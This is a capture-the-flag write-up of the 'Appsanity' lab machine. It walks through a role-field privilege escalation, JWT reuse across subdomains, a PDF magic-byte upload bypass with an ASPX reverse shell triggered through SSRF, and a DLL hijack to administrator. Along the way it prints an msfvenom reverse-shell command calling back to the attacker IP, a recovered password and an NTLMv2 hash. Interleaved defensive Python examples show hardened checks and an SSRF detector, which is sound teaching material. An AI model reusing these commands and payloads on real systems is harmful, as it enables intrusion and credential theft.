NMAP:
# Nmap 7.94 scan initiated Sat Oct 28 15:01:28 2023 as: nmap -sCV -p80,443,7680 -Pn -n -oN allports 10.10.11.238
Nmap scan report for 10.10.11.238
Host is up (0.075s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://meddigi.htb/
443/tcp open https?
7680/tcp open pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 15:02:21 2023 -- 1 IP address (1 host up) scanned in 53.32 seconds
kali@kali ~/machines/appsanity/nmap $ nmap 10.10.11.238 -p- --min-rate 5000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-28 15:03 EDT
Nmap scan report for 10.10.11.238
Host is up (0.075s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5985/tcp open wsman
The application running on it did not have many features: you could just create a user and send messages to a supervisor, which you did not have assigned, so nobody reviews them.
Since there was a box to send data that was supposed to be reviewed by somebody, I sent a lot of XSS payloads to see if somebody reached my box, but never got a hit.
So instead of focusing more on XSS payloads, I tried to see if there was another subdomain, and I found portal.meddigi.htb:
kali@kali ~/machines/appsanity/content $ wfuzz -c -u 'https://meddigi.htb/' -H 'Host: FUZZ.meddigi.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150 --hh 315
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://meddigi.htb/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000048: 200 56 L 162 W 2976 Ch "portal"
Looking at it, I found another web application, but it required credentials to log in, and I did not have any.
So I tried SQLi (no SQLi) and a bunch of other stuff, but no luck.
Then I looked closely at how I was registering my user, because it was possible that the form had hidden parameters I could modify with Burp Suite to set my privileges to a higher level.
Looking at it in detail, I went through all the fields; at least the Acctype one was set to 1.
So I tried setting it to 0 to see if something changed and got an error, but when I tried 2 I did not get the error, and when I logged in I could see the panel as a doctor.
It had the possibility of adding patients, but that was not the interesting thing here. The good thing was that I could probably reuse the cookie to authenticate as a doctor on portal.meddigi.htb, because that panel was just for doctors.
I used the cookie with the same values and names, put it on the login page of portal.meddigi.htb, reloaded the page, and was able to log in.
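The two weaknesses just described, the Acctype field being honoured at registration and the same cookie working on a second subdomain, as an added example that is not the MedDigi application's code. It shows a registration handler that binds an allow-list of fields instead of everything the client sends, and a token check that enforces issuer and audience so a token minted for one site is refused by another. The signing key, the portal's audience name and the form field names other than Acctype are assumptions; CAPTURED_TOKEN is the access_token cookie that appears later in this writeup.

```python
# Added example (not the MedDigi application's code): server-side handling of the
# registration form and of the JWT the writeup reuses across subdomains. The signing
# key, the portal's audience name and the field names other than Acctype are
# assumptions; CAPTURED_TOKEN is the access_token cookie shown later in the writeup.
import base64
import hashlib
import hmac
import json
import time

CLIENT_FIELDS = {"Email", "Password"}   # fields a client may set (assumed names)
DEFAULT_ACCTYPE = 1                     # value the registration form sent by default


def register_vulnerable(form):
    """Binds every submitted field, so a client can send Acctype=2 and become a doctor."""
    user = {"Acctype": DEFAULT_ACCTYPE}
    user.update(form)                   # mass assignment: the client's value wins
    return user


def register_hardened(form):
    """Binds only allow-listed fields; the role is decided by the server."""
    user = {k: v for k, v in form.items() if k in CLIENT_FIELDS}
    user["Acctype"] = DEFAULT_ACCTYPE
    return user


def _b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def jwt_claims(token):
    """Decodes the claims WITHOUT verifying; useful for inspecting a captured token."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def make_hs256_token(claims, key):
    """Mints an HS256 JWT with a constructed key (demonstration only)."""
    header = _b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"


def verify_token(token, key, expected_iss, expected_aud, now=None):
    """Checks signature, validity window, issuer and audience; returns the claims
    or raises ValueError. A token minted for the user site (aud=MedDigiUser) is
    refused by a portal that expects its own audience, even with a shared key."""
    try:
        header, body, sig = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    if json.loads(_b64url_decode(header)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(body))
    now = time.time() if now is None else now
    if claims.get("exp", 0) <= now or claims.get("nbf", 0) > now:
        raise ValueError("token outside its validity window")
    if claims.get("iss") != expected_iss:
        raise ValueError("wrong issuer")
    if claims.get("aud") != expected_aud:
        raise ValueError("wrong audience")
    return claims


# The access_token cookie captured in this writeup (claims are inspectable without the key).
CAPTURED_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6InRlc3RAdGVzdCIsIm5iZiI6MTY5ODYxMTQyNiwiZXhwIjoxNjk4NjE1MDI2LCJpYXQiOjE2OTg2MTE0MjYsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9."
    "5GPmaae3WSE1Q1JJreHoBndi4DYS4mp3k2PcVuz5-CM"
)

if __name__ == "__main__":
    form = {"Email": "test@test", "Password": "x", "Acctype": "2"}
    print(register_vulnerable(form)["Acctype"], register_hardened(form)["Acctype"])
    print(jwt_claims(CAPTURED_TOKEN))
```

The audience check is the cheap second line; the first is that the doctors' portal signs with its own key rather than sharing one with the public site, so a token from one cannot verify on the other at all.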
By looking in detail at each function of the panel, I found that there were probably two vulnerabilities I could try to exploit. One was an SSRF in Issue Prescription, since I could put a link there. The other was a file upload, and since it was an IIS server I could try ASP or ASPX shells and look for a way to browse to my file.
The Upload Reports feature only accepted PDF file types, so I could try to bypass the filter by putting the magic bytes of a PDF first and then my ASPX reverse shell. The thing here was that I did not know where to find the shell, since to trigger it I had to browse to it.
That way I could bypass the simple filter: I did not even need to change the format of the file, I just needed to change the header, and that was it.
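The filter bypass above, as an added example that is not the portal's own code: the weak check that only looks at the leading magic bytes sits next to a stricter check (extension allow-list, magic bytes, PDF trailer, no ASP.NET directives) and a storage rule that throws away the client's filename. The file contents are constructed samples.

```python
# Added example, not the portal's own code. Contrasts the magic-bytes-only filter the
# writeup bypasses with a stricter check, and shows a storage naming rule that keeps an
# uploaded file from ever being served under a script extension. Samples are constructed.
import os
import re
import uuid

PDF_MAGIC = b"%PDF-"
ALLOWED_EXT = {".pdf"}
# ASP.NET page directives / server-side script blocks have no place in a PDF.
# "<%" alone is deliberately not matched: PDF streams can legitimately contain it.
SCRIPT_MARKERS = re.compile(rb"<%@|<script\s+runat=", re.IGNORECASE)


def check_upload_weak(filename, data):
    """The filter the writeup describes: only the leading magic bytes are inspected,
    so a file named shell.aspx that starts with %PDF- is accepted."""
    return data.startswith(PDF_MAGIC)


def check_upload_strict(filename, data):
    """Extension allow-list, magic bytes, PDF trailer and no server-side markup.
    Returns (accepted, reason) so the caller can log why a file was refused."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    if not data.startswith(PDF_MAGIC):
        return False, "not a PDF header"
    if b"%%EOF" not in data[-1024:]:          # a real PDF ends with its trailer
        return False, "missing PDF trailer"
    if SCRIPT_MARKERS.search(data):
        return False, "server-side markup inside file"
    return True, "ok"


def stored_name(original_filename):
    """Name used on disk: a random id plus a forced .pdf extension. The original
    name is discarded entirely, so nothing the client controls reaches the path
    and IIS never sees an .aspx in the uploads directory."""
    return f"{uuid.uuid4()}.pdf"


# Constructed samples: a minimal valid PDF, and a script file wearing a PDF header.
GENUINE_PDF = (b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n"
               b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")
DISGUISED = b'%PDF-1.7\n<%@ Page Language="C#" %>\n'

if __name__ == "__main__":
    print("weak  :", check_upload_weak("shell.aspx", DISGUISED))
    print("strict:", check_upload_strict("shell.aspx", DISGUISED))
    print("strict:", check_upload_strict("report.pdf", GENUINE_PDF))
    print("stored as", stored_name("shell.aspx"))
```

Even the strict check is content sniffing, so the last line of defence is where the file lives: an uploads directory outside the web root, or one whose script handler mappings are removed, served back through a handler that sets Content-Type to application/pdf.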
Like I said before, even if I put a shell on the box I had to trigger it, and the Issue Prescription page allowed me to do an SSRF that points to local services on the box.
First I ran an internal port discovery to see which ports might be open internally. The principle was that when I put a port that was open I got the response back, otherwise a redirect.
So I captured the request and did the internal port discovery by simply filtering out the 302 status, since that meant the page did not exist, and when it existed it gave me a 200.
So with ffuf I fuzzed the ports:
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : https://portal.meddigi.htb/Prescriptions/SendEmail
:: Wordlist : FUZZ: /home/kali/machines/appsanity/content/dic
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
:: Header : Accept: */*
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Accept-Encoding: gzip, deflate
:: Header : Sec-Fetch-Site: same-origin
:: Header : Te: trailers
:: Header : Cookie: .AspNetCore.Antiforgery.d2PTPu5_rLA=CfDJ8CmqBmoJQudAuydydRd1KSODVIKyZAN0Ztae8slccg4kqsO-hnQhyZi1S9GwA36D9Ns6HSA3vAKRD46xTaqH7-T2oSIhs-_BFYiS6b0ffESTd2-HPdizIz1_msXHOCBW_O91nALnf_Cr0bTMtJ0Tycs; access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6InRlc3RAdGVzdCIsIm5iZiI6MTY5ODYxMTQyNiwiZXhwIjoxNjk4NjE1MDI2LCJpYXQiOjE2OTg2MTE0MjYsImlzcyI6Ik1lZERpZ2kiLCJhdWQiOiJNZWREaWdpVXNlciJ9.5GPmaae3WSE1Q1JJreHoBndi4DYS4mp3k2PcVuz5-CM
:: Header : Referer: https://portal.meddigi.htb/Prescriptions
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Origin: https://portal.meddigi.htb
:: Header : Sec-Fetch-Dest: empty
:: Header : Sec-Fetch-Mode: cors
:: Header : Host: portal.meddigi.htb
:: Data : Email=test%40test.com&Link=http%3A%2F%2F127.0.0.1%3AFUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 50
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response status: 302,500
[Status: 200, Size: 2060, Words: 688, Lines: 54, Duration: 1479ms]
* FUZZ: 8080
Knowing that, port 8080 could be an HTTP proxy, so I hit it manually and found this:
I could see my uploaded report, and if I scrolled to the right I could see the hyperlink and where it points to. It points to my malicious shell:
https://portal.meddigi.htb/ViewReport.aspx?file=e98d768d-efa8-4a37-9399-feda213ef947_shell.aspx
So with the SSRF I could try to browse to that file and load it. When I tried to do it without the SSRF it never loaded, but if I load the file through the SSRF and the proxy, I get the shell:
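The SSRF used above, first to sweep loopback ports and then to reach the internal service on 8080, as an added example that is not the MedDigi application's code. The first function is the check a "send this link" feature should run before fetching anything; the second is a detector for the port sweep, run over constructed application log lines. The log format, the allowed-port policy and the sample addresses are assumptions.

```python
# Added example, not the MedDigi application's code: how the "send a link" feature should
# vet an outbound URL before fetching it, plus a detector for the kind of port sweep the
# writeup performs, run over constructed application log lines. The log format, the
# allowed-port policy and the sample addresses are assumptions.
import ipaddress
import re
import socket
from collections import defaultdict
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}          # policy assumption for an emailed link


def default_resolver(host):
    """Every address the name resolves to; a name may map to several."""
    try:
        return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def is_safe_link(url, resolver=default_resolver):
    """True only for an http(s) URL on an allowed port, without credentials, whose
    every resolved address is globally routable. Loopback (127.0.0.1, ::1), RFC 1918,
    link-local, 0.0.0.0 and unresolvable names are all refused. The caller must then
    connect to the vetted address itself, not re-resolve the name, or a DNS rebind can
    swap in an internal address between the check and the fetch."""
    try:
        parts = urlsplit(url)
        port = parts.port              # raises ValueError for a non-numeric port
    except ValueError:
        return False
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username or parts.password:
        return False
    if (port or (443 if scheme == "https" else 80)) not in ALLOWED_PORTS:
        return False
    addrs = resolver(parts.hostname)
    if not addrs:
        return False
    for addr in addrs:
        try:
            if not ipaddress.ip_address(addr).is_global:
                return False
        except ValueError:
            return False
    return True


# Constructed application log, one line per outbound fetch the feature made.
SAMPLE_LOG = """\
2023-10-29T20:10:01Z user=7 client=10.10.14.15 link=http://127.0.0.1:80 status=302
2023-10-29T20:10:01Z user=7 client=10.10.14.15 link=http://127.0.0.1:81 status=302
2023-10-29T20:10:02Z user=7 client=10.10.14.15 link=http://127.0.0.1:443 status=302
2023-10-29T20:10:02Z user=7 client=10.10.14.15 link=http://127.0.0.1:5985 status=302
2023-10-29T20:10:03Z user=7 client=10.10.14.15 link=http://127.0.0.1:8080 status=200
2023-10-29T20:10:03Z user=7 client=10.10.14.15 link=http://127.0.0.1:8443 status=302
2023-10-29T20:11:40Z user=9 client=10.10.14.22 link=https://example.com/doc status=200
""".splitlines()
LOG_RE = re.compile(r"user=(?P<user>\S+) .*link=(?P<link>\S+) status=(?P<status>\d+)")


def find_port_sweeps(lines, threshold=5):
    """Returns {(user, host): sorted ports} for users whose links touched at least
    `threshold` distinct ports on a non-global host (the 302/200 pattern the
    writeup filters on is exactly this, seen from the server side)."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m["link"])
        host = parts.hostname or ""
        try:
            port = parts.port or (443 if parts.scheme == "https" else 80)
        except ValueError:
            continue
        try:
            internal = not ipaddress.ip_address(host).is_global
        except ValueError:                  # a hostname rather than an IP literal
            internal = host.lower() == "localhost"
        if internal:
            seen[(m["user"], host)].add(port)
    return {k: sorted(v) for k, v in seen.items() if len(v) >= threshold}


if __name__ == "__main__":
    print(is_safe_link("http://127.0.0.1:8080"), is_safe_link("https://example.com/"))
    print(find_port_sweeps(SAMPLE_LOG))
```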
kali@kali ~/machines/appsanity/content $ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.238] 61384
Spawn Shell...
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
appsanity\svc_exampanel
c:\windows\system32\inetsrv>
Being the user svc_exampanel, I could read the user flag:
c:\Users>cd svc_exampanel\desktop
cd svc_exampanel\desktop
c:\Users\svc_exampanel\Desktop>type user.txt
type user.txt
f318588a51ca69a4b1926221c65c4d42
c:\Users\svc_exampanel\Desktop>
After enumerating for a while on the box, I realized I probably needed to pivot to the user devdoc, since it was the only user in the Remote Management group:
c:\Users\svc_exampanel\Desktop>net user devdoc
net user devdoc
User name devdoc
Full Name devdoc
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 9/24/2023 10:31:55 AM
Password expires Never
Password changeable 9/24/2023 10:31:55 AM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/30/2023 9:50:47 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use*Users
Global Group memberships *None
The command completed successfully.
Looking for possible passwords or interesting stuff, I found a DLL in the only folder I had access to under inetpub:
Directory of c:\inetpub\ExaminationPanel\ExaminationPanel\bin
09/26/2023 07:30 AM <DIR> .
09/26/2023 07:30 AM <DIR> ..
09/24/2023 08:46 AM 4,991,352 EntityFramework.dll
09/24/2023 08:46 AM 591,752 EntityFramework.SqlServer.dll
09/24/2023 08:46 AM 13,824 ExaminationManagement.dll
09/24/2023 08:46 AM 40,168 Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll
09/24/2023 08:49 AM <DIR> roslyn
09/24/2023 08:46 AM 431,792 System.Data.SQLite.dll
09/24/2023 08:46 AM 206,512 System.Data.SQLite.EF6.dll
09/24/2023 08:46 AM 206,520 System.Data.SQLite.Linq.dll
09/24/2023 08:49 AM <DIR> x64
09/24/2023 08:49 AM <DIR> x86
All the other files were common files; the only weird one was ExaminationManagement.dll, so I transferred it to my Windows box and looked at it with dnSpy.
It has functions to do all kinds of stuff, but the cool thing is that it was creating some SQLite databases and using credentials to do it. However, the creds were not in plain text; it was using data from a registry key:
c:\inetpub\ExaminationPanel\ExaminationPanel\bin>powershell (Get-ItemProperty -Path "HKLM:\Software\MedDigi" -Name "EncKey").EncKey
powershell (Get-ItemProperty -Path "HKLM:\Software\MedDigi" -Name "EncKey").EncKey
1g0tTh3R3m3dy!!
I tried WinRM with it, and it worked:
kali@kali ~/machines/appsanity/content/dll debug $ evil-winrm -i 10.10.11.238 -u 'devdoc' -p '1g0tTh3R3m3dy!!'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\devdoc\Documents> whoami
appsanity\devdoc
Looking at everything, I found a big program in ProgramData, called
-a---- 10/20/2023 2:56 PM 102912 ReportManagement.exe
It was running, and it was using port 100 to interact with it:
143 9 1448 6924 5624 0 ReportManagement
TCP 0.0.0.0:100 0.0.0.0:0 LISTENING 5900
I could try to interact with it, but it would be kind of blind, so what I did was transfer it to my box and analyze it.
I wasted a lot of time here, because I tried to use some disassemblers, but not many of them worked; since it was a 32-bit program and a .exe, it was a pain to debug.
The easiest one that worked for me at the end of the day was Ghidra, since just sorting the strings gave me a better idea of what the program was using and how it works.
It did not have a specific main function or anything like that, which is why I decided to go for the strings.
I got a bunch of stuff, but I could see clearly that it was using the Library directory, in which I was able to write, and from that directory it was loading a DLL called ExternalUpload.dll.
So the path here was easy: knowing which DLL it was using and how the program works, I could drop my malicious DLL in that folder, interact with the program on port 100 and use the upload option, which would trigger my exploit.
kali@kali ~/machines/appsanity/content $ msfvenom -p windows/x64/exec cmd='\\10.10.14.15\smb\nc.exe -e cmd.exe 10.10.14.15 443' -f dll > shell.dll
Then transfer it, put it in the folder, and finally interact with the server using the upload option:
kali@kali ~/machines/appsanity/content/root $ nc 127.0.0.1 100
Reports Management administrative console. Type "help" to view available commands.
upload http://10.10.14.15
Attempting to upload to external source.
Once I did that, I got the callback on the SMB share for nc.exe:
[*] Administrator::APPSANITY:aaaaaaaaaaaaaaaa:16abe4fe072e554e3dbac06d88d5935d:010100000000000000e5d376480bda01aecbe2a4617c86d400000000010010004e00490068006e0057007a0069004900030010004e00490068006e0057007a006900490002001000690074006a005500710064007400460004001000690074006a00550071006400740046000700080000e5d376480bda0106000400020000000800300030000000000000000000000000300000f51c188a2f913934cc3ff52d19490a924dd8cbdcd96411842d2b85834fadddc90a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310035000000000000000000
[*] Connecting Share(1:smb)
[*] Connecting Share(2:IPC$)
[-] SMB2_TREE_CONNECT not found SystemResources
[-] SMB2_TREE_CONNECT not found SystemResources
[*] Disconnecting Share(2:IPC$)
And then the shell in my listener:
kali@kali ~/machines/appsanity/content/root $ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.15] from (UNKNOWN) [10.10.11.238] 61362
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\ReportManagement>whoami
whoami
appsanity\administrator
C:\Program Files\ReportManagement>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
37c12244c4b624be76381579c7ccf924
C:\Program Files\ReportManagement>
Focus on the function.
Probably that function is calling a DLL that I can hijack.